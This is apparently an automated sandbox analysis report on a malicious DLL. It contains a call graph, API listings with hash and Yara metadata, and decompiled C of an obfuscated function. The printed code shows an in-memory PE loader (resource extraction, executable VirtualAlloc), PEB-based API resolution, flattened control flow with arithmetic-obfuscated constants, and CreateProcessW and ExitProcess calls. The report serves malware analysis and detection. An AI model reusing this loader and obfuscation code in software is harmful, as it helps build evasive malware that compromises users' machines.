100022c3 SetLastError 32072 100022a9 32041->32072 32042 100022d5 32043 10001990 ___DllMainCRTStartup SetLastError 32042->32043 32044 100022ee 32043->32044 32045 10002310 SetLastError 32044->32045 32046 10002322 32044->32046 32044->32072 32045->32072 32047 10002331 SetLastError 32046->32047 32048 10002343 32046->32048 32047->32072 32049 1000234e SetLastError 32048->32049 32051 10002360 GetNativeSystemInfo 32048->32051 32049->32072 32052 10002414 SetLastError 32051->32052 32053 10002426 VirtualAlloc 32051->32053 32052->32072 32054 10002472 GetProcessHeap HeapAlloc 32053->32054 32055 10002447 VirtualAlloc 32053->32055 32057 100024ac 32054->32057 32058 1000248c VirtualFree SetLastError 32054->32058 32055->32054 32056 10002463 SetLastError 32055->32056 32056->32072 32059 10001990 ___DllMainCRTStartup SetLastError 32057->32059 32058->32072 32060 1000250e 32059->32060 32061 1000251c VirtualAlloc 32060->32061 32069 10002512 32060->32069 32062 1000254b ___DllMainCRTStartup 32061->32062 32078 100019c0 32062->32078 32065 1000257f ___DllMainCRTStartup 32065->32069 32088 10001ff0 32065->32088 32113 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32069->32113 32070 100025e8 ___DllMainCRTStartup 32070->32069 32070->32072 32107 18d80c 32070->32107 32072->31921 32073 1000264f SetLastError 32073->32069 32076 100019ab 32075->32076 32077 1000199f SetLastError 32075->32077 32076->32041 32076->32042 32076->32072 32077->32076 32079 100019f0 32078->32079 32080 10001a83 32079->32080 32081 10001a2c VirtualAlloc 32079->32081 32087 10001aa0 ___DllMainCRTStartup 32079->32087 32082 10001990 ___DllMainCRTStartup SetLastError 32080->32082 32083 10001a50 32081->32083 32085 10001a57 ___DllMainCRTStartup 32081->32085 32084 10001a9c 32082->32084 32083->32087 32086 10001aa4 VirtualAlloc 32084->32086 32084->32087 32085->32079 32086->32087 32087->32065 32089 10002029 IsBadReadPtr 32088->32089 32098 1000201f 32088->32098 32091 10002053 32089->32091 32089->32098 32092 10002085 SetLastError 32091->32092 32093 10002099 32091->32093 32091->32098 32092->32098 32114 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32093->32114 32095 100020b3 32096 100020bf SetLastError 32095->32096 32100 100020e9 32095->32100 32096->32098 32098->32069 32101 10001cb0 32098->32101 32099 100021f9 SetLastError 32099->32098 32100->32098 32100->32099 32102 10001cf8 ___DllMainCRTStartup 32101->32102 32103 10001e01 32102->32103 32105 10001ddd 32102->32105 32115 10001b80 32102->32115 32104 10001b80 ___DllMainCRTStartup 2 API calls 32103->32104 32104->32105 32105->32070 32108 18d8cc 32107->32108 32109 18d8a5 32107->32109 32108->32072 32108->32073 32122 185cf9 32109->32122 32113->32072 32114->32095 32116 10001b9c 32115->32116 32119 10001b92 32115->32119 32117 10001c04 VirtualProtect 32116->32117 32120 10001baa 32116->32120 32117->32119 32119->32102 32120->32119 32121 10001be2 VirtualFree 32120->32121 32121->32119 32132 186288 32122->32132 32123 18648d 32146 179700 32123->32146 32126 18648b 32126->32108 32135 183cbb 32126->32135 32130 17ab66 GetPEB 32130->32132 32132->32123 32132->32126 32132->32130 32134 17ae03 GetPEB 32132->32134 32138 18fc96 32132->32138 32142 17ea7b 32132->32142 32156 191310 32132->32156 32160 1912a8 GetPEB 32132->32160 32161 17e7ce GetPEB 32132->32161 32162 18e35a GetPEB 32132->32162 32134->32132 32136 172d9f GetPEB 32135->32136 32137 183d36 ExitProcess 32136->32137 32137->32108 32139 18fcac 32138->32139 32163 172d9f 32139->32163 32143 17ea9f 32142->32143 32144 172d9f GetPEB 32143->32144 32145 17eb24 SHGetFolderPathW 32144->32145 32145->32132 32147 17972e 32146->32147 32148 191310 GetPEB 32147->32148 32149 179995 32148->32149 32171 18679c 32149->32171 32151 1799d1 32155 1799dc 32151->32155 32175 184dad GetPEB 32151->32175 32153 1799fc 32176 184dad GetPEB 32153->32176 32155->32126 32157 19132d 32156->32157 32177 173efe 32157->32177 32160->32132 32161->32132 32162->32132 32164 172e5b 32163->32164 32168 172e80 lstrcmpiW 32163->32168 32169 18c761 GetPEB 32164->32169 32166 172e6a 32170 17f2c1 GetPEB 32166->32170 32168->32132 32169->32166 32170->32168 32172 1867d5 32171->32172 32173 172d9f GetPEB 32172->32173 32174 186847 CreateProcessW 32173->32174 32174->32151 32175->32153 32176->32155 32178 173f17 32177->32178 32181 173cd1 32178->32181 32182 173cec 32181->32182 32183 172d9f GetPEB 32182->32183 32184 173d79 32183->32184 32184->32132

                                                                                                                      Executed Functions

                                                                                                                      Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 63 100023c7-100023cd 57->63 58->63 59->41 61 10002472-1000248a GetProcessHeap HeapAlloc 60->61 62 10002447-10002461 VirtualAlloc 60->62 65 100024ac-10002510 call 10001990 61->65 66 1000248c-100024a7 VirtualFree SetLastError 61->66 62->61 64 10002463-1000246d SetLastError 62->64 67 100023d5 63->67 68 100023cf-100023d2 63->68 64->41 72 10002512 65->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 65->73 66->41 67->54 68->67 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 102 10002621-10002643 call 18d80c 100->102 103 1000266a-10002678 100->103 104 10002687-1000268a 101->104 106 10002646-1000264d 102->106 105 1000267b 103->105 104->41 105->104 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00185CF9 Relevance: 10.3, Strings: 8, Instructions: 349COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 148 185cf9-186280 149 186288-18628e 148->149 150 18646c-18647a call 18e35a 149->150 151 186294-18629a 149->151 161 18647f-186485 150->161 152 18648d-1864ad call 179700 151->152 153 1862a0-1862a6 151->153 162 1864b2-1864b7 152->162 155 1862ac-1862b2 153->155 156 186427-18642d 153->156 159 186368-18638e call 17ea7b 155->159 160 1862b8-1862be 155->160 163 18642f-186433 156->163 164 186462-186467 156->164 172 186393-186422 call 1912a8 call 17ab66 call 17e7ce call 17ae03 159->172 166 1862c0-1862c6 160->166 167 186337-186363 call 191310 160->167 161->149 168 18648b 161->168 169 1864b8-1864c4 162->169 170 18645a-186460 163->170 171 186435-18643c 163->171 164->149 166->161 173 1862cc-186303 call 17ab66 call 18fc96 166->173 167->149 168->169 170->163 170->164 175 18644a-186453 171->175 172->149 187 186308-186332 call 17ae03 173->187 176 18643e-186442 175->176 177 186455-186457 175->177 176->177 183 186444-186447 176->183 177->170 183->175 187->161
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00185CF9() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int* _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t407;
				signed int* _t428;
				void* _t429;
				signed short* _t435;
				signed int* _t436;

				_t436 =  &_v1720;
				_v1644 = 0xf4f2e5;
				_v1644 = _v1644 << 6;
				_t397 = 0x4a;
				_v1644 = _v1644 / _t397;
				_v1644 = _v1644 ^ 0x00d3d8d4;
				_t395 = 0;
				_v1660 = 0x8afd01;
				_t429 = 0xc405385;
				_v1660 = _v1660 | 0xf6dee043;
				_v1660 = _v1660 ^ 0x10b315be;
				_t398 = 0x45;
				_v1660 = _v1660 / _t398;
				_v1660 = _v1660 ^ 0x035da190;
				_v1692 = 0xc25321;
				_v1692 = _v1692 | 0x3e4ae4fc;
				_t399 = 0x12;
				_v1692 = _v1692 * 0x47;
				_v1692 = _v1692 ^ 0x6159278c;
				_v1692 = _v1692 ^ 0x0b15fa01;
				_v1572 = 0xf82306;
				_v1572 = _v1572 | 0xe3d21ea1;
				_v1572 = _v1572 ^ 0xe3f9e5ad;
				_v1676 = 0x48d4cb;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffff2f85;
				_v1676 = _v1676 + 0x9649;
				_v1676 = _v1676 ^ 0x048c097a;
				_v1584 = 0x8f76c2;
				_v1584 = _v1584 * 0x1d;
				_v1584 = _v1584 ^ 0x10457475;
				_v1596 = 0xadf885;
				_v1596 = _v1596 ^ 0xa065608b;
				_v1596 = _v1596 ^ 0xa0c2245b;
				_v1684 = 0xeb1e45;
				_v1684 = _v1684 + 0x7cda;
				_v1684 = _v1684 / _t399;
				_v1684 = _v1684 + 0xffffa266;
				_v1684 = _v1684 ^ 0x0000adef;
				_v1632 = 0x65fdd9;
				_v1632 = _v1632 + 0xb49;
				_v1632 = _v1632 + 0xfffffa9d;
				_v1632 = _v1632 ^ 0x00600454;
				_v1716 = 0x9184ac;
				_v1716 = _v1716 + 0xffff0d2e;
				_v1716 = _v1716 | 0x6897691f;
				_v1716 = _v1716 ^ 0x2cb5e262;
				_v1716 = _v1716 ^ 0x442095be;
				_v1576 = 0x53941d;
				_v1576 = _v1576 >> 2;
				_v1576 = _v1576 ^ 0x001525d4;
				_v1640 = 0xd435ce;
				_v1640 = _v1640 + 0xffff1394;
				_v1640 = _v1640 + 0xffff8dc5;
				_v1640 = _v1640 ^ 0x00d594ec;
				_v1708 = 0x173594;
				_v1708 = _v1708 ^ 0xe44a87fe;
				_v1708 = _v1708 << 7;
				_v1708 = _v1708 + 0xee7d;
				_v1708 = _v1708 ^ 0x2ed8d8cc;
				_v1700 = 0x94f2ae;
				_v1700 = _v1700 << 3;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 * 0x58;
				_v1700 = _v1700 ^ 0x66d58e50;
				_v1604 = 0xd84545;
				_v1604 = _v1604 | 0x98cc5948;
				_v1604 = _v1604 ^ 0x98d8436e;
				_v1668 = 0xea4a2f;
				_v1668 = _v1668 + 0xf7bd;
				_v1668 = _v1668 >> 7;
				_v1668 = _v1668 ^ 0xf693418b;
				_v1668 = _v1668 ^ 0xf6966bd3;
				_v1580 = 0xa2c8e;
				_v1580 = _v1580 + 0x2944;
				_v1580 = _v1580 ^ 0x00011cb1;
				_v1720 = 0x34ce8d;
				_v1720 = _v1720 | 0xf5ffffea;
				_v1720 = _v1720 >> 9;
				_v1720 = _v1720 ^ 0x00732654;
				_v1564 = 0x8a9f58;
				_v1564 = _v1564 + 0x7c05;
				_v1564 = _v1564 ^ 0x008f283e;
				_v1588 = 0xa4f562;
				_v1588 = _v1588 ^ 0x7b7d16a6;
				_v1588 = _v1588 ^ 0x7bd14885;
				_v1704 = 0xee28fd;
				_v1704 = _v1704 + 0xffffe5b2;
				_v1704 = _v1704 + 0xffff824b;
				_v1704 = _v1704 + 0x581e;
				_v1704 = _v1704 ^ 0x00e0f0ab;
				_v1712 = 0x91da58;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x485191fe;
				_v1712 = _v1712 ^ 0x920a86f0;
				_v1624 = 0xf1deea;
				_t400 = 3;
				_v1624 = _v1624 / _t400;
				_t401 = 0x38;
				_v1624 = _v1624 * 0x4f;
				_v1624 = _v1624 ^ 0x18ea6ffc;
				_v1680 = 0x898c63;
				_v1680 = _v1680 * 0x6a;
				_v1680 = _v1680 * 0x38;
				_v1680 = _v1680 | 0xa82efbb3;
				_v1680 = _v1680 ^ 0xfd6ff7e4;
				_v1688 = 0xae251e;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 >> 0xf;
				_v1688 = _v1688 + 0xb719;
				_v1688 = _v1688 ^ 0x000aff47;
				_v1696 = 0x40e656;
				_v1696 = _v1696 | 0x21fda4e6;
				_v1696 = _v1696 + 0xca7;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xf7c0cc6c;
				_v1652 = 0x8f24c5;
				_v1652 = _v1652 << 0xb;
				_v1652 = _v1652 ^ 0x5fc65761;
				_v1652 = _v1652 ^ 0x26eed855;
				_v1600 = 0xeb50f4;
				_v1600 = _v1600 | 0xe5f9ced2;
				_v1600 = _v1600 ^ 0xe5f6f1e5;
				_v1672 = 0x2ac6e7;
				_v1672 = _v1672 / _t401;
				_v1672 = _v1672 + 0xffffde53;
				_v1672 = _v1672 + 0xffff94e0;
				_v1672 = _v1672 ^ 0x000ac548;
				_v1648 = 0x7ee323;
				_v1648 = _v1648 ^ 0xc4404dab;
				_v1648 = _v1648 << 2;
				_v1648 = _v1648 ^ 0x10f162dd;
				_v1568 = 0xe6f77a;
				_v1568 = _v1568 | 0x9ec6220d;
				_v1568 = _v1568 ^ 0x9ee5ede4;
				_v1616 = 0x905f8c;
				_v1616 = _v1616 + 0xffff5c7c;
				_v1616 = _v1616 >> 2;
				_v1616 = _v1616 ^ 0x0024325f;
				_v1592 = 0xde4b6;
				_v1592 = _v1592 * 0x3f;
				_v1592 = _v1592 ^ 0x03679ec9;
				_v1664 = 0xe0cee4;
				_v1664 = _v1664 >> 2;
				_v1664 = _v1664 * 0x13;
				_v1664 = _v1664 * 0x71;
				_v1664 = _v1664 ^ 0xd75e35a6;
				_v1636 = 0x97f252;
				_v1636 = _v1636 | 0xcb237ae2;
				_v1636 = _v1636 << 0xf;
				_v1636 = _v1636 ^ 0xfd7df459;
				_v1656 = 0xc6c2a7;
				_v1656 = _v1656 + 0x66f2;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 | 0xc8135773;
				_v1656 = _v1656 ^ 0xc81a6fdc;
				_v1608 = 0xd95490;
				_v1608 = _v1608 + 0xffff3702;
				_v1608 = _v1608 ^ 0x00d9a4ac;
				_v1612 = 0x2487c2;
				_t435 = _v1608;
				_v1612 = _v1612 * 0x77;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x0fb1a599;
				_v1620 = 0xa1030c;
				_v1620 = _v1620 >> 3;
				_v1620 = _v1620 << 0x10;
				_v1620 = _v1620 ^ 0x20685173;
				_v1628 = 0xb9794c;
				_v1628 = _v1628 >> 0xa;
				_v1628 = _v1628 >> 4;
				_v1628 = _v1628 ^ 0x0003794a;
				while(_t429 != 0x35deb36) {
					if(_t429 == 0x3b58d4d) {
						_push(_v1628);
						_push(_v1620);
						_push(_v1612);
						_push(_t395);
						_push(_t395);
						_push(_v1608);
						_push(_t401);
						_push(_t395);
						E00179700(_t435, _v1656, __eflags);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					if(_t429 == 0x7ac99d0) {
						_t381 = _t435;
						__eflags =  *_t435 - _t395;
						if(__eflags == 0) {
							L18:
							_t429 = 0xe3616dc;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L17;
							}
							_t428 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t407 =  *_t381 & 0x0000ffff;
								__eflags = _t407;
								if(_t407 == 0) {
									break;
								}
								__eflags = _t407 - 0x20;
								if(_t407 == 0x20) {
									break;
								}
								 *_t428 = _t407;
								_t428 =  &(_t428[0]);
								__eflags = _t428;
							}
							_t401 = 0;
							__eflags = 0;
							 *_t428 = 0;
							L17:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t429 == 0x94e99a1) {
						_push(_t401);
						E0017EA7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588); // executed
						E001912A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
						_push(_v1652);
						_push(_v1696);
						_push(0x1711dc);
						E0017E7CE(E0017AB66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
						_t401 = _v1592;
						E0017AE03(_t401, _v1664, _v1636, _t385);
						_t436 =  &(_t436[0x17]);
						_t429 = 0x3b58d4d;
						continue;
					}
					if(_t429 == 0xc405385) {
						_t401 = 0x208;
						E00191310(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
						_t436 =  &(_t436[4]);
						_t429 = 0x35deb36;
						continue;
					}
					_t445 = _t429 - 0xe3616dc;
					if(_t429 == 0xe3616dc) {
						_push(_v1716);
						_push(_v1632);
						_push(0x17115c);
						_t393 = E0018FC96(_v1576, _v1640, E0017AB66(_v1596, _v1684, _t445), _v1708,  &_v1560); // executed
						asm("sbb edi, edi");
						_t401 = _v1700;
						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
						E0017AE03(_t401, _v1604, _v1668, _t391);
						_t436 =  &(_t436[8]);
					}
					L20:
					if(_t429 != 0x74a6920) {
						continue;
					}
					goto L23;
				}
				_t435 = E0018E35A();
				_t429 = 0x7ac99d0;
				goto L20;
			}



























































                                                                                                                      0x00185cf9
                                                                                                                      0x00185cff
                                                                                                                      0x00185d09
                                                                                                                      0x00185d18
                                                                                                                      0x00185d1d
                                                                                                                      0x00185d23
                                                                                                                      0x00185d2b
                                                                                                                      0x00185d2d
                                                                                                                      0x00185d35
                                                                                                                      0x00185d3a
                                                                                                                      0x00185d42
                                                                                                                      0x00185d4e
                                                                                                                      0x00185d53
                                                                                                                      0x00185d59
                                                                                                                      0x00185d61
                                                                                                                      0x00185d69
                                                                                                                      0x00185d76
                                                                                                                      0x00185d77
                                                                                                                      0x00185d7b
                                                                                                                      0x00185d83
                                                                                                                      0x00185d8b
                                                                                                                      0x00185d96
                                                                                                                      0x00185da1
                                                                                                                      0x00185dac
                                                                                                                      0x00185db4
                                                                                                                      0x00185db9
                                                                                                                      0x00185dc1
                                                                                                                      0x00185dc9
                                                                                                                      0x00185dd1
                                                                                                                      0x00185de4
                                                                                                                      0x00185deb
                                                                                                                      0x00185df6
                                                                                                                      0x00185e01
                                                                                                                      0x00185e0c
                                                                                                                      0x00185e17
                                                                                                                      0x00185e1f
                                                                                                                      0x00185e2d
                                                                                                                      0x00185e31
                                                                                                                      0x00185e39
                                                                                                                      0x00185e41
                                                                                                                      0x00185e49
                                                                                                                      0x00185e51
                                                                                                                      0x00185e59
                                                                                                                      0x00185e61
                                                                                                                      0x00185e69
                                                                                                                      0x00185e71
                                                                                                                      0x00185e79
                                                                                                                      0x00185e81
                                                                                                                      0x00185e89
                                                                                                                      0x00185e94
                                                                                                                      0x00185e9c
                                                                                                                      0x00185ea7
                                                                                                                      0x00185eaf
                                                                                                                      0x00185eb7
                                                                                                                      0x00185ebf
                                                                                                                      0x00185ec7
                                                                                                                      0x00185ecf
                                                                                                                      0x00185ed7
                                                                                                                      0x00185edc
                                                                                                                      0x00185ee4
                                                                                                                      0x00185eec
                                                                                                                      0x00185ef4
                                                                                                                      0x00185ef9
                                                                                                                      0x00185f03
                                                                                                                      0x00185f09
                                                                                                                      0x00185f11
                                                                                                                      0x00185f1c
                                                                                                                      0x00185f27
                                                                                                                      0x00185f32
                                                                                                                      0x00185f3a
                                                                                                                      0x00185f42
                                                                                                                      0x00185f47
                                                                                                                      0x00185f4f
                                                                                                                      0x00185f57
                                                                                                                      0x00185f62
                                                                                                                      0x00185f6d
                                                                                                                      0x00185f78
                                                                                                                      0x00185f80
                                                                                                                      0x00185f88
                                                                                                                      0x00185f8d
                                                                                                                      0x00185f95
                                                                                                                      0x00185fa0
                                                                                                                      0x00185fab
                                                                                                                      0x00185fb6
                                                                                                                      0x00185fc1
                                                                                                                      0x00185fcc
                                                                                                                      0x00185fd7
                                                                                                                      0x00185fdf
                                                                                                                      0x00185fe7
                                                                                                                      0x00185fef
                                                                                                                      0x00185ff7
                                                                                                                      0x00185fff
                                                                                                                      0x00186007
                                                                                                                      0x0018600c
                                                                                                                      0x00186011
                                                                                                                      0x00186019
                                                                                                                      0x00186021
                                                                                                                      0x0018602f
                                                                                                                      0x00186034
                                                                                                                      0x0018603f
                                                                                                                      0x00186040
                                                                                                                      0x00186044
                                                                                                                      0x0018604c
                                                                                                                      0x00186059
                                                                                                                      0x00186062
                                                                                                                      0x00186066
                                                                                                                      0x0018606e
                                                                                                                      0x00186076
                                                                                                                      0x0018607e
                                                                                                                      0x00186083
                                                                                                                      0x00186088
                                                                                                                      0x00186090
                                                                                                                      0x00186098
                                                                                                                      0x001860a0
                                                                                                                      0x001860a8
                                                                                                                      0x001860b0
                                                                                                                      0x001860b5
                                                                                                                      0x001860bd
                                                                                                                      0x001860c5
                                                                                                                      0x001860ca
                                                                                                                      0x001860d2
                                                                                                                      0x001860da
                                                                                                                      0x001860e5
                                                                                                                      0x001860f0
                                                                                                                      0x001860fb
                                                                                                                      0x00186109
                                                                                                                      0x0018610d
                                                                                                                      0x00186115
                                                                                                                      0x0018611d
                                                                                                                      0x00186125
                                                                                                                      0x0018612d
                                                                                                                      0x00186135
                                                                                                                      0x0018613a
                                                                                                                      0x00186142
                                                                                                                      0x0018614d
                                                                                                                      0x00186158
                                                                                                                      0x00186163
                                                                                                                      0x0018616b
                                                                                                                      0x00186173
                                                                                                                      0x00186178
                                                                                                                      0x00186180
                                                                                                                      0x00186193
                                                                                                                      0x0018619a
                                                                                                                      0x001861a5
                                                                                                                      0x001861ad
                                                                                                                      0x001861b7
                                                                                                                      0x001861c0
                                                                                                                      0x001861c4
                                                                                                                      0x001861cc
                                                                                                                      0x001861d4
                                                                                                                      0x001861dc
                                                                                                                      0x001861e1
                                                                                                                      0x001861e9
                                                                                                                      0x001861f1
                                                                                                                      0x001861f9
                                                                                                                      0x001861fe
                                                                                                                      0x00186206
                                                                                                                      0x0018620e
                                                                                                                      0x00186219
                                                                                                                      0x00186224
                                                                                                                      0x0018622f
                                                                                                                      0x0018623c
                                                                                                                      0x00186243
                                                                                                                      0x00186247
                                                                                                                      0x0018624c
                                                                                                                      0x00186254
                                                                                                                      0x0018625c
                                                                                                                      0x00186261
                                                                                                                      0x00186266
                                                                                                                      0x0018626e
                                                                                                                      0x00186276
                                                                                                                      0x0018627b
                                                                                                                      0x00186280
                                                                                                                      0x00186288
                                                                                                                      0x0018629a
                                                                                                                      0x0018648d
                                                                                                                      0x00186491
                                                                                                                      0x00186495
                                                                                                                      0x0018649c
                                                                                                                      0x0018649d
                                                                                                                      0x0018649e
                                                                                                                      0x001864a9
                                                                                                                      0x001864aa
                                                                                                                      0x001864ad
                                                                                                                      0x001864b7
                                                                                                                      0x001864b7
                                                                                                                      0x001864bb
                                                                                                                      0x001864c4
                                                                                                                      0x001864c4
                                                                                                                      0x001862a6
                                                                                                                      0x00186427
                                                                                                                      0x00186429
                                                                                                                      0x0018642d
                                                                                                                      0x00186462
                                                                                                                      0x00186462
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018642f
                                                                                                                      0x0018642f
                                                                                                                      0x0018642f
                                                                                                                      0x00186433
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00186435
                                                                                                                      0x0018644a
                                                                                                                      0x0018644a
                                                                                                                      0x0018644d
                                                                                                                      0x00186450
                                                                                                                      0x00186453
